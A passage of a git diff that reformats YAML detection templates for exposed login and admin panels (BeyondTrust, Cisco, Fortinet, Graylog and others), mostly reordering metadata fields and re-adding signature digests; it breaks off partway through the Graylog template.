@@ -8,16 +8,16 @@ info:
BeyondTrust Privileged Remote Access login panel was detected.
reference:
- https://www.beyondtrust.com/products/privileged-remote-access
+ classification:
+ cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\""
- product: privileged_remote_access
vendor: beyondtrust
+ product: privileged_remote_access
+ shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\""
tags: panel,beyondtrust,login,detect
- classification:
- cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,11 +25,11 @@ http:
- "{{BaseURL}}/login/pre_login_agreement"
stop-at-first-match: true
-
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")'
condition: and
-# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml
index 6a65031aa9..de2e5a21aa 100644
--- a/http/exposed-panels/bonobo-server-panel.yaml
+++ b/http/exposed-panels/bonobo-server-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Bonobo Git Server login panel was detected.
+ classification:
+ cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.favicon.hash:-219625874
- product: bonobo_git_server
vendor: bonobogitserver
+ product: bonobo_git_server
+ shodan-query: http.favicon.hash:-219625874
tags: panel,bonobo,git,login,detect
- classification:
- cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -24,8 +24,8 @@ http:
host-redirects: true
max-redirects: 2
-
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -42,4 +42,5 @@ http:
group: 1
regex:
- '(?i)bonobo git server \((.*)\)'
-# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml
index 6a39dad0f2..3f161fca02 100644
--- a/http/exposed-panels/busybox-repository-browser.yaml
+++ b/http/exposed-panels/busybox-repository-browser.yaml
@@ -8,16 +8,16 @@ info:
Busybox Repository Browser was detected.
reference:
- https://github.com/mirror/busybox
+ classification:
+ cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Busybox Repository Browser"
- product: busybox
vendor: busybox
+ product: busybox
+ fofa-query: title="Busybox Repository Browser"
tags: detect,busybox,oss,panel
- classification:
- cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml
index 62b2500796..d99ee91f03 100644
--- a/http/exposed-panels/c2/caldera-c2.yaml
+++ b/http/exposed-panels/c2/caldera-c2.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/mitre/caldera
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+ classification:
+ cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: http.favicon.hash:-636718605
- product: caldera
vendor: mitre
+ product: caldera
+ fofa-query: http.favicon.hash:-636718605
tags: c2,ir,osint,caldera,panel
- classification:
- cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml
index e254f7c93c..d1d74ac944 100644
--- a/http/exposed-panels/changedetection-panel.yaml
+++ b/http/exposed-panels/changedetection-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/dgtlmoon/changedetection.io
- https://changedetection.io/
+ classification:
+ cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Change Detection"
- product: changedetection
vendor: changedetection
+ product: changedetection
+ shodan-query: title:"Change Detection"
tags: panel,changedetection,detect
- classification:
- cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml
index 1a6723ed46..9dba8428ab 100644
--- a/http/exposed-panels/cisco-unity-panel.yaml
+++ b/http/exposed-panels/cisco-unity-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
A Cisco Unity Connection instance was detected.
+ classification:
+ cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"Cisco Unity Connection"
- product: unity_connection
vendor: cisco
+ product: unity_connection
+ shodan-query: html:"Cisco Unity Connection"
tags: panel,cisco,unity,login,detect
- classification:
- cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -23,7 +23,6 @@ http:
- "{{BaseURL}}"
stop-at-first-match: true
-
host-redirects: true
max-redirects: 2
@@ -35,7 +34,9 @@ http:
- "Cisco Unity Connection Administration"
- ">Cisco Unity Connection"
condition: or
+
- type: status
status:
- 200
-# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml
index 511d492c89..f7d963afd1 100644
--- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml
+++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml
@@ -8,16 +8,16 @@ info:
CISCO Expressway login panel was detected.
reference:
- https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
+ classification:
+ cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Cisco Expressway"
- product: expressway_software
vendor: cisco
+ product: expressway_software
+ shodan-query: html:"Cisco Expressway"
tags: panel,cisco,login,detect
- classification:
- cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
group: 1
regex:
- 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>'
-# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml
index 5bf3d39266..dcde9a2779 100644
--- a/http/exposed-panels/craftercms-panel.yaml
+++ b/http/exposed-panels/craftercms-panel.yaml
@@ -8,16 +8,16 @@ info:
CrafterCMS login panel was detected.
reference:
- https://craftercms.org/
+ classification:
+ cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"craftercms"
- product: craftercms
vendor: craftercms
+ product: craftercms
+ shodan-query: http.title:"craftercms"
tags: panel,craftercms,login,detect
- classification:
- cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
-# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml
index 114ea05aca..04b0e401ab 100644
--- a/http/exposed-panels/cyberchef-panel.yaml
+++ b/http/exposed-panels/cyberchef-panel.yaml
@@ -8,16 +8,16 @@ info:
A Cyber Chef Panel was detected
reference:
- https://cyberchef.org
+ classification:
+ cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"CyberChef"
- product: cyberchef
vendor: gchq
+ product: cyberchef
+ shodan-query: title:"CyberChef"
tags: panel,cyberchef,login,detect
- classification:
- cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml
index 7df0a85efa..ac05c08034 100644
--- a/http/exposed-panels/dialogic-xms-console.yaml
+++ b/http/exposed-panels/dialogic-xms-console.yaml
@@ -4,16 +4,16 @@ info:
name: Dialogic XMS Admin Console - Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Dialogic XMS Admin Console"
- product: powermedia_xms
vendor: dialogic
+ product: powermedia_xms
+ shodan-query: title:"Dialogic XMS Admin Console"
tags: panel,dialogic,admin,login,detect
- classification:
- cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml
index 8efafeb675..66bf7ba982 100644
--- a/http/exposed-panels/discuz-panel.yaml
+++ b/http/exposed-panels/discuz-panel.yaml
@@ -4,17 +4,17 @@ info:
name: Discuz Panel - Detection
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: comsenz
+ product: discuz\\!
shodan-query: title:"Discuz!"
fofa-query: title="Discuz!"
- product: discuz\\!
- vendor: comsenz
tags: panel,discuz,detect,login
- classification:
- cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
group: 1
regex:
- 'X([0-9.]+)<\/em><\/p>'
-# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml
index b814e8ed5f..e7b3078789 100644
--- a/http/exposed-panels/dockge-panel.yaml
+++ b/http/exposed-panels/dockge-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/louislam/dockge
- https://dockge.kuma.pet/
+ classification:
+ cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Dockge"
- product: dockge
vendor: dockge.kuma
+ product: dockge
+ shodan-query: title:"Dockge"
tags: panel,dockge,login
- classification:
- cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml
index 99a0d4f601..08e95aeb54 100644
--- a/http/exposed-panels/dokuwiki-panel.yaml
+++ b/http/exposed-panels/dokuwiki-panel.yaml
@@ -8,16 +8,16 @@ info:
Dokuwiki login panel was detected.
reference:
- https://www.dokuwiki.org/dokuwiki
+ classification:
+ cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"/dokuwiki/"
- product: dokuwiki
vendor: dokuwiki
+ product: dokuwiki
+ shodan-query: http.html:"/dokuwiki/"
tags: panel,dokuwiki,login
- classification:
- cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")'
condition: and
-# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml
index da3481df8c..b1dbb6b5a4 100644
--- a/http/exposed-panels/doris-panel.yaml
+++ b/http/exposed-panels/doris-panel.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: info
description: Doris panel detection template.
+ classification:
+ cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:24048806
- product: doris
vendor: apache
+ product: doris
+ shodan-query: http.favicon.hash:24048806
tags: doris,panel,login,detect
- classification:
- cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml
index 4e8d4c5d81..bc0b92bed6 100644
--- a/http/exposed-panels/emqx-panel.yaml
+++ b/http/exposed-panels/emqx-panel.yaml
@@ -8,16 +8,16 @@ info:
EMQX login panel was detected.
reference:
- https://www.emqx.io/
+ classification:
+ cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"EMQX Dashboard"
- product: emqx
vendor: emqx
+ product: emqx
+ shodan-query: http.title:"EMQX Dashboard"
tags: panel,emqx,login,detect
- classification:
- cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
group: 1
regex:
- 'but\s+(emqx\-dashboard[0-9a-z\-]+)'
-# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml
index ad41d62a83..fdd15b80dc 100644
--- a/http/exposed-panels/endpoint-protector-panel.yaml
+++ b/http/exposed-panels/endpoint-protector-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Endpoint Protector - Reporting and Administration Tool login panel was detected.
+ classification:
+ cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Endpoint Protector"
- product: endpoint_protector
vendor: cososys
+ product: endpoint_protector
+ shodan-query: http.title:"Endpoint Protector"
tags: panel,endpoint,login,detect,endpoint-protector
- classification:
- cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml
index fee71e4931..8d79a4db66 100644
--- a/http/exposed-panels/fortinet/forticlientems-panel.yaml
+++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml
@@ -4,16 +4,16 @@ info:
name: FortiClient Endpoint Management Server Panel - Detect
author: h4sh5
severity: info
+ classification:
+ cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-800551065
- product: forticlient_endpoint_management_server
vendor: fortinet
+ product: forticlient_endpoint_management_server
+ shodan-query: http.favicon.hash:-800551065
tags: panel,fortinet,forticlient,ems,login,detect
- classification:
- cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
group: 1
regex:
- 'VERSION_FULL\\u0022: \\u0022(.*?)\\u0022'
-# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/fossbilling-panel.yaml b/http/exposed-panels/fossbilling-panel.yaml
index ba9eb605ba..e3cee2d869 100644
--- a/http/exposed-panels/fossbilling-panel.yaml
+++ b/http/exposed-panels/fossbilling-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
FOSSBilling panel has been detected.
+ classification:
+ cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"FOSSBilling"
- product: fossbilling
vendor: fossbilling
+ product: fossbilling
+ shodan-query: title:"FOSSBilling"
tags: fossbilling,panel,detect
- classification:
- cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml
index cc8da5b7b5..2dd7380f15 100644
--- a/http/exposed-panels/freshrss-panel.yaml
+++ b/http/exposed-panels/freshrss-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Freshrss panel has been detected.
- metadata:
- max-request: 1
- verified: true
- shodan-query: title:"Freshrss"
- product: freshrss
- vendor: freshrss
- tags: freshrss,panel,detect
-
classification:
cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: freshrss
+ product: freshrss
+ shodan-query: title:"Freshrss"
+ tags: freshrss,panel,detect
+
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml
index cdafd824d1..5f34354e50 100644
--- a/http/exposed-panels/ghost-panel.yaml
+++ b/http/exposed-panels/ghost-panel.yaml
@@ -8,16 +8,16 @@ info:
Beautiful, modern publishing with email newsletters and paid subscriptions built-in.
reference:
- https://ghost.org/
+ classification:
+ cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="Ghost"
- product: ghost
vendor: ghost
+ product: ghost
+ fofa-query: app="Ghost"
tags: panel,ghost,login,detect
- classification:
- cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- 'content="Ghost"'
condition: or
case-insensitive: true
-# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/gradle/gradle-develocity-panel.yaml b/http/exposed-panels/gradle/gradle-develocity-panel.yaml
index 6a447b6747..5342861c9d 100644
--- a/http/exposed-panels/gradle/gradle-develocity-panel.yaml
+++ b/http/exposed-panels/gradle/gradle-develocity-panel.yaml
@@ -7,16 +7,16 @@ info:
description: Gradle Develocity Build Cache Node login panel was detected.
reference:
- https://gradle.com/gradle-enterprise-solutions/
- metadata:
- max-request: 1
- verified: true
- shodan-query: http.html:"Develocity Build Cache Node"
- product: build_cache_node
- vendor: gradle
- tags: panel,gradle,detect,login
-
classification:
cpe: cpe:2.3:a:gradle:build_cache_node:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: gradle
+ product: build_cache_node
+ shodan-query: http.html:"Develocity Build Cache Node"
+ tags: panel,gradle,detect,login
+
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
group: 1
regex:
- '(?i)"applicationVersion":"([0-9.]+)"'
-# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml
index af334283e8..657df6dbdb 100644
--- a/http/exposed-panels/graylog-panel.yaml
+++ b/http/exposed-panels/graylog-panel.yaml
@@ -8,16 +8,16 @@ info:
Graylog login panel was detected.
reference:
- https://graylog.org/
+ classification:
+ cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Graylog Web Interface"
- product: graylog
vendor: graylog
+ product: graylog
+ shodan-query: http.title:"Graylog Web Interface"
tags: panel,graylog,login,detect
- classification:
